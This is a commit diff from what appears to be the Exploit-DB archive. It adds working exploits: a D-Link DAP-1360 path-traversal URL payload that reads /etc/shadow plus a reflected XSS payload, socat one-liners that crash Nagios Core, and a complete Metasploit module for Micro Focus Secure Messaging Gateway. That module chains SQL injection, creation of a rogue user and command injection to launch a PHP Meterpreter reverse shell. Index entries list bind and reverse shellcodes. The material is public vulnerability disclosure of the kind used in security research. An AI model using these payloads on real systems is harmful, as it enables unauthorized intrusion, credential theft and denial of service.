DB: 2018-07-25

3 changes to exploits/shellcodes

Nagios Core 4.4.1 - Denial of Service

Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)

D-link DAP-1360 - Path Traversal / Cross-Site Scripting

Linux/x86 - Bind (4444/TCP) Shell + IPv6 Shellcode (100 bytes)
Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (100 bytes)

exploits/hardware/webapps/45084.txt

@@ -0,0 +1,60 @@
+# Exploit Title: D-Link DAP-1360  File path traversal and Cross site
+scripting[reflected] can lead to Authentication Bypass easily.
+# Date: 20-07-2018
+# Exploit Author: r3m0t3nu11
+# Contact : http://twitter.com/r3m0t3nu11
+# Vendor : www.dlink.com
+# Version: Hardware version: F1
+Firmware version: 6.O5
+# Tested on:All Platforms
+
+
+1) Description
+
+After Successfully Connected to D-Link DIR-600
+Router(FirmWare Version : 2.01), Any User Can Bypass The Router's
+Root password as well bypass admin panel.
+
+D-Link DAP-1360  devices with v6.x firmware allow remote attackers to
+read passwords via a errorpage paramater which lead to absolute path
+traversal attack,
+
+Its More Dangerous when your Router has a public IP with remote login
+enabled.
+
+
+IN MY CASE,
+Tested Router IP : http://192.168.70.69/
+
+
+
+Video POC : https://www.dropbox.com/s/tvpq2jm3jv48j3c/D-link.mov?dl=0
+
+2) Proof of Concept
+
+Step 1: Go to
+Router Login Page : http://192.168.70.69:80
+
+Step 2:
+Add the payload to URL.
+
+Payload:
+getpage=html%2Findex.html&errorpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
+
+
+
+Now u can get root password by reading /etc/shadow.
+
+2- XSS
+  Step 1: Go to
+Router Login Page : http://192.168.70.69:80
+
+Step 2:
+Add the payload to URL.
+
+Payload:
+getpage=html%2Findex.html&errorpage=<Script>alert('r3m0t3nu11')</script>&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
+
+u will get r3m0t3nu11 name pop up as reflected xss
+
+Greetz to : Samir Hadji,0n3,C0ld Z3r0,alm3refh group,0x30 team,zero way team.

exploits/linux/dos/45082.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Nagios Core Multiple Local Denial of Service
+# Date: 2018-07-09
+# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
+# Vendor Homepage: https://www.nagios.org/
+# Software Link: https://www.nagios.org/downloads/nagios-core/
+# Version: 4.4.1 and earlier
+# Tested on: 4.4.1
+
+
+qh_core, qh_help, and qh_echo in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.
+
+1. [CVE-2018-13458] qh_core
+
+$ echo -ne “#core\0" | socat unix-connect:./poc/nagios.qh -
+$ echo -ne “@core\0" | socat unix-connect:./poc/nagios.qh -
+
+2. [CVE-2018-13457] qh_echo
+
+$ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh -
+$ echo -ne “@echo\0" | socat unix-connect:./poc/nagios.qh -
+
+3. [CVE-2018-13441] qh_help
+
+$ echo -ne “#help\0" | socat unix-connect:./poc/nagios.qh -
+$ echo -ne “@help\0" | socat unix-connect:./poc/nagios.qh -

exploits/php/webapps/45083.rb

@@ -0,0 +1,220 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MicroFocus Secure Messaging Gateway Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway.
+        An unauthenticated user can execute a terminal command under the context of the web user.
+
+        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
+        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system.
+        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
+        to access this endpoint without having a valid session.
+
+        Combining these vulnerabilities gives the opportunity execute operation system commands under the context
+        of the web user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
+          ['CVE', '2018-12464'],
+          ['CVE', '2018-12465'],
+          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
+          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
+        ],
+      'DefaultOptions'  =>
+        {
+          'Payload' => 'php/meterpreter/reverse_tcp',
+          'Encoder' => 'php/base64'
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Jun 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+      ]
+    )
+  end
+
+  def execute_query(query)
+    #
+    # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques
+    # but since we are able to use stacked-query approach, following form of payload is required in order to be able
+    # get back the output of query !
+    #
+    r = rand_text_alphanumeric(3 + rand(3))
+    sql = r
+    sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
+    sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
+    sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
+    sql << query
+    sql << "; -- "
+    sql << r
+
+    send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
+      'vars_post' => {
+        'appkey' => r
+      }
+    )
+
+  end
+
+  def something_went_wrong
+    fail_with Failure::Unknown, 'Something went wrong'
+  end
+
+  def check
+    r = rand_text_numeric(15..35)
+    res = execute_query("SELECT #{r}")
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+    unless res.code == 200 && res.body.include?(r)
+      return CheckCode::Safe
+    end
+    CheckCode::Vulnerable
+  end
+
+  def implant_payload(cookie)
+    print_status('Creating a domain record with a malformed DKIM data')
+    p = [
+      {
+        :id => 'temp_0',
+        :Description => rand_text_alpha(5),
+        :DkimList => [
+          {
+            :Domain => "$(php -r '#{payload.encoded}')",
+            :Selector => '',
+            :TempId => 'tempDkim_1'
+          }
+        ]
+      }
+    ].to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'cache' => 0,
+      },
+      'vars_post' => {
+        'StateData' => '[{"ouid":1}]',
+        'SaveData' => p
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?('DbNodeId')
+      # Defining as global variable since we need to access them later within clean up function.
+      begin
+        @domainid  = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
+        @dkimid  = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+      rescue => e
+        fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
+      end
+      print_good('Payload is successfully implanted')
+    else
+      something_went_wrong
+    end
+  end
+
+  def create_user
+    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection
+    # issue location where requires a valid session !
+    print_status('Creating a user with appropriate privileges')
+
+    # Defining as global variable since we need to access them later within clean up function.
+    @username = rand_text_alpha_lower(5..25)
+    @userid = rand_text_numeric(6..8)
+    query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"
+
+    execute_query(query)
+    res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")
+
+    if res && res.code == 200 && res.body.include?(@username)
+      print_good("User successfully created. Username : #{@username}")
+    else
+      something_went_wrong
+    end
+  end
+
+  def login
+    print_status("Authenticating with created user")
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'security', 'securitygate.php'),
+      'vars_post' => {
+        'username' => @username,
+        'password' => rand_text_alpha_lower(5..25),
+        'passwordmandatory' => rand_text_alpha_lower(5..25),
+        'LimitInterfaceId' => 1
+      }
+    )
+    if res && res.code == 200 && res.body.include?('/ui/default/index.php')
+      print_good('Successfully authenticated')
+      cookie = res.get_cookies
+    else
+      something_went_wrong
+    end
+    cookie
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    create_user
+    cookie = login
+    implant_payload(cookie)
+
+    print_status('Triggering an implanted payload')
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'cache' => 0,
+      },
+      'vars_post' => {
+        'DkimRecordId' => @dkimid
+      }
+    })
+
+  end
+
+  def on_new_session(session)
+    print_status('Cleaning up...')
+    cmd = ""
+    cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "'
+    cmd << "DELETE FROM account WHERE loginname ='#{@username}';"
+    cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};"
+    cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};"
+    cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};"
+    cmd << '"'
+    session.shell_command_token(cmd)
+  end
+
+end

files_exploits.csv

@@ -6023,6 +6023,7 @@ id,file,description,date,author,type,platform,port
 45060,exploits/multiple/dos/45060.html,"Google Chrome - Swiftshader Blitting Floating-Point Precision Errors",2018-07-19,"Google Security Research",dos,multiple,
 45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple,
 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,
+45082,exploits/linux/dos/45082.txt,"Nagios Core 4.4.1 - Denial of Service",2018-07-24,"Fakhri Zulkifli",dos,linux,
 45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow",2018-07-23,"Nassim Asrir",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
@@ -39696,6 +39697,8 @@ id,file,description,date,author,type,platform,port
 45057,exploits/php/webapps/45057.txt,"MyBB New Threads Plugin 1.1 - Cross-Site Scripting",2018-07-19,0xB9,webapps,php,80
 45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php,
 45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware,
+45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php,
 45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
 45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
 45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
+45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,

files_shellcodes.csv

@@ -896,4 +896,4 @@ id,file,description,date,author,type,platform
 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
 45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm
 45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
-45080,shellcodes/linux_x86/45080.c,"Linux/x86 - Bind (4444/TCP) Shell + IPv6 Shellcode (100 bytes)",2018-07-23,"Kartik Durg",shellcode,linux_x86
+45080,shellcodes/linux_x86/45080.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (100 bytes)",2018-07-23,"Kartik Durg",shellcode,linux_x86